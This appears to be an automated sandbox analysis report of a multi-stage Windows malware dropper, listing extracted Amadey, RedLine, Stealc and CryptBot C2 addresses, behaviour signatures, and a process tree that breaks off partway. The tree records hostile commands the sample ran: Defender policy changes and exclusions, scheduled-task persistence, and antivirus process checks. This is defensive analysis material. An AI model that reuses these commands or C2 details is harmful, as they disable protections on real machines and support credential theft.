Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2024 22:45

General

  • Target

    dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe

  • Size

    1.8MB

  • MD5

    3e6018448b2fd0bc965239531aa9ea33

  • SHA1

    6367426b4a117e28e0e9b11e337997799e8a29f4

  • SHA256

    dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7

  • SHA512

    fa21030c89fe79be88c9f732e242e0847ef7677bc4da0298d193ec7cb4dd9ec57722d61fd485217a3124e308982cc4d0617f2a8290a4f9c9edadc334905bc263

  • SSDEEP

    24576:t0TSfo/OAjIR8Jg2iekVGuZiI/vNsmM6nu69YsZ+qtbPyrjKRjNFW4+ONyoGl:thfoGAjII9jEZiI/vChelYUPgajNFhq

Malware Config

Extracted

Family

amadey

Version

4.41

Botnet

fed3aa

C2

http://185.215.113.16

Attributes
  • install_dir

    44111dbc49

  • install_file

    axplong.exe

  • strings_key

    8d0ad6945b1a30a186ec2d30be6db0b5

  • url_paths

    /Jo89Ku7d/index.php

rc4.plain

Extracted

Family

redline

Botnet

LiveTraffic

C2

95.179.250.45:26212

Extracted

Family

redline

Botnet

@OLEH_PSP

C2

65.21.18.51:45580

Extracted

Family

stealc

Botnet

default2

C2

http://185.215.113.17

Attributes
  • url_path

    /2fb6c2cc8dce150a.php

Extracted

Family

stealc

Botnet

default

C2

http://91.202.233.158

Attributes
  • url_path

    /e96ea2db21fa9a1b.php

Extracted

Family

redline

Botnet

bundle

C2

185.215.113.67:15206

Extracted

Family

redline

Botnet

TG CLOUD @RLREBORN Admin @FATHEROFCARDERS

C2

89.105.223.196:29862

Extracted

Family

cryptbot

C2

sevtvf17ht.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Extracted

Family

stealc

Botnet

rave

C2

http://185.215.113.103

Attributes
  • url_path

    /e2b1563c6670f193.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 14 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 14 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • .NET Reactor proctector 9 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 8 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 41 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 27 IoCs
  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 36 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 10 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 28 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 4 IoCs
  • Modifies system certificate store 2 TTPs 11 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:1204
      • C:\Users\Admin\AppData\Local\Temp\dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe
        "C:\Users\Admin\AppData\Local\Temp\dcbc5e6d65a7645c08e9bf865bf2d0fe141b7561304e7b81307c0aec472c16a7.exe"
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Identifies Wine through registry keys
        • Loads dropped DLL
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1728
        • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
          "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Adds Run key to start application
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:796
          • C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe
            "C:\Users\Admin\AppData\Local\Temp\1000002001\gold.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2172
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1108
          • C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe
            "C:\Users\Admin\AppData\Local\Temp\1000004001\crypteda.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:2124
            • C:\Users\Admin\AppData\Roaming\T3USPjGDkV.exe
              "C:\Users\Admin\AppData\Roaming\T3USPjGDkV.exe"
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Users\Admin\AppData\Roaming\MovqcuUWuS.exe
              "C:\Users\Admin\AppData\Roaming\MovqcuUWuS.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2248
          • C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe
            "C:\Users\Admin\AppData\Local\Temp\1000005001\Nework.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in Windows directory
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2468
            • C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
              "C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:1512
              • C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe
                "C:\Users\Admin\AppData\Local\Temp\1000056001\JavvvUmar.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                PID:2528
                • C:\Users\Admin\AppData\Local\Temp\service123.exe
                  "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                  7⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:2200
                • C:\Windows\SysWOW64\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1768
          • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2088
          • C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe
            "C:\Users\Admin\AppData\Local\Temp\1000191001\needmoney.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:2368
            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              C:\Users\Admin\AppData\Local\Temp\svchost015.exe
              5⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:2492
          • C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe
            "C:\Users\Admin\AppData\Local\Temp\1000254001\penis.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1032
          • C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe
            "C:\Users\Admin\AppData\Local\Temp\1000259001\bundle.exe"
            4⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:856
          • C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe
            "C:\Users\Admin\AppData\Local\Temp\1000284001\acentric.exe"
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious use of AdjustPrivilegeToken
            PID:2516
          • C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe
            "C:\Users\Admin\AppData\Local\Temp\1000285001\2.exe"
            4⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:2644
          • C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe
            "C:\Users\Admin\AppData\Local\Temp\1000287001\splwow64.exe"
            4⤵
            • Executes dropped EXE
            • Drops file in Windows directory
            PID:2376
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c move Emotions Emotions.bat & Emotions.bat
              5⤵
              • Loads dropped DLL
              PID:2176
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • Suspicious use of AdjustPrivilegeToken
                PID:2384
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "wrsa opssvc"
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2412
              • C:\Windows\SysWOW64\tasklist.exe
                tasklist
                6⤵
                • Enumerates processes with tasklist
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:1600
              • C:\Windows\SysWOW64\findstr.exe
                findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                6⤵
                  PID:2116
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 607698
                  6⤵
                  • System Location Discovery: System Language Discovery
                  PID:876
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "MaskBathroomCompositionInjection" Participants
                  6⤵
                    PID:1720
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c copy /b ..\Navy + ..\Temperature + ..\Streaming + ..\Ashley + ..\Ensures + ..\Language + ..\Viruses + ..\Bet + ..\Fla + ..\Asbestos + ..\Width Q
                    6⤵
                      PID:1476
                    • C:\Users\Admin\AppData\Local\Temp\607698\Waters.pif
                      Waters.pif Q
                      6⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of FindShellTrayWindow
                      • Suspicious use of SendNotifyMessage
                      PID:2600
                    • C:\Windows\SysWOW64\choice.exe
                      choice /d y /t 5
                      6⤵
                        PID:904
                  • C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000290001\crypted.exe"
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:2440
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1056
                  • C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000293001\385121.exe"
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3020
                    • C:\Users\Admin\AppData\Local\Temp\7zSEA1.tmp\Install.exe
                      .\Install.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      PID:700
                      • C:\Users\Admin\AppData\Local\Temp\7zS1084.tmp\Install.exe
                        .\Install.exe /RNXdidDHt "385121" /S
                        6⤵
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates system info in registry
                        PID:2304
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                          7⤵
                          • System Location Discovery: System Language Discovery
                          PID:880
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                            8⤵
                            • Indirect Command Execution
                            PID:2408
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                              9⤵
                              • System Location Discovery: System Language Discovery
                              PID:1992
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                10⤵
                                • System Location Discovery: System Language Discovery
                                PID:2344
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                            8⤵
                            • Indirect Command Execution
                            • System Location Discovery: System Language Discovery
                            PID:1708
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                              9⤵
                                PID:1228
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                  10⤵
                                    PID:2744
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                8⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:1448
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                  9⤵
                                    PID:2088
                                    • \??\c:\windows\SysWOW64\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                      10⤵
                                        PID:2412
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                    8⤵
                                    • Indirect Command Execution
                                    PID:1288
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                      9⤵
                                        PID:1928
                                        • \??\c:\windows\SysWOW64\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                          10⤵
                                            PID:1608
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                        8⤵
                                        • Indirect Command Execution
                                        PID:2200
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          9⤵
                                            PID:2392
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                              10⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • System Location Discovery: System Language Discovery
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1752
                                              • C:\Windows\SysWOW64\gpupdate.exe
                                                "C:\Windows\system32\gpupdate.exe" /force
                                                11⤵
                                                  PID:2112
                                        • C:\Windows\SysWOW64\forfiles.exe
                                          "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                                          7⤵
                                          • Indirect Command Execution
                                          PID:2152
                                          • C:\Windows\SysWOW64\cmd.exe
                                            /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                            8⤵
                                              PID:2260
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                9⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2540
                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                                                  10⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3024
                                          • C:\Windows\SysWOW64\schtasks.exe
                                            schtasks /CREATE /TN "bAqRDoFVIdSJfWxTlj" /SC once /ST 22:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI\ZpCAYLhRQZdPRrU\fIQqLZn.exe\" PV /XkfcdidfUWc 385121 /S" /V1 /F
                                            7⤵
                                            • Drops file in Windows directory
                                            • System Location Discovery: System Language Discovery
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:3548
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2304 -s 596
                                            7⤵
                                            • Loads dropped DLL
                                            • Program crash
                                            PID:2384
                                    • C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe"
                                      4⤵
                                      • Drops startup file
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Adds Run key to start application
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: AddClipboardFormatListener
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      • Suspicious use of SetWindowsHookEx
                                      PID:1720
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\1000301001\explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2644
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • System Location Discovery: System Language Discovery
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1548
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1668
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'explorer.exe'
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2688
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "explorer" /tr "C:\ProgramData\explorer.exe"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:3672
                                      • C:\Users\Admin\AppData\Local\Temp\qvipgc.exe
                                        "C:\Users\Admin\AppData\Local\Temp\qvipgc.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:2124
                                      • C:\Users\Admin\AppData\Local\Temp\ujqwfi.exe
                                        "C:\Users\Admin\AppData\Local\Temp\ujqwfi.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:3432
                                      • C:\Users\Admin\AppData\Local\Temp\cymaxl.exe
                                        "C:\Users\Admin\AppData\Local\Temp\cymaxl.exe"
                                        5⤵
                                        • Executes dropped EXE
                                        PID:3028
                                    • C:\Users\Admin\AppData\Local\Temp\1000308001\33a79e7ec3.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000308001\33a79e7ec3.exe"
                                      4⤵
                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                      • Checks BIOS information in registry
                                      • Executes dropped EXE
                                      • Identifies Wine through registry keys
                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1768
                                    • C:\Users\Admin\AppData\Local\Temp\1000309001\e0e4b0e858.exe
                                      "C:\Users\Admin\AppData\Local\Temp\1000309001\e0e4b0e858.exe"
                                      4⤵
                                      • Executes dropped EXE
                                      • System Location Discovery: System Language Discovery
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      • Suspicious use of FindShellTrayWindow
                                      • Suspicious use of SendNotifyMessage
                                      PID:1604
                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                        5⤵
                                          PID:852
                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                            "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                            6⤵
                                            • Checks processor information in registry
                                            • Modifies registry class
                                            • Suspicious use of AdjustPrivilegeToken
                                            • Suspicious use of FindShellTrayWindow
                                            • Suspicious use of SendNotifyMessage
                                            PID:1064
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.0.1027602579\2110816763" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1120 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {252f7b1a-c239-4cc0-8962-29c6b2401db6} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1292 10cd3b58 gpu
                                              7⤵
                                                PID:1820
                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.1.437327096\1562837263" -parentBuildID 20221007134813 -prefsHandle 1488 -prefMapHandle 1484 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f6c564af-d4ca-4369-97fc-f337374f2733} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1500 fefbf58 socket
                                                7⤵
                                                  PID:2024
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.2.394752247\335845047" -childID 1 -isForBrowser -prefsHandle 1936 -prefMapHandle 1932 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {64ddaed3-7880-474a-a1cf-62602e63f64d} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 1948 e64458 tab
                                                  7⤵
                                                    PID:1036
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1064.3.729681725\253632892" -childID 2 -isForBrowser -prefsHandle 2880 -prefMapHandle 2844 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 768 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {60cda5ee-b166-48d3-a979-0ddfe9f60262} 1064 "\\.\pipe\gecko-crash-server-pipe.1064" 2892 1b932c58 tab
                                                    7⤵
                                                      PID:304
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account
                                                  5⤵
                                                    PID:3536
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
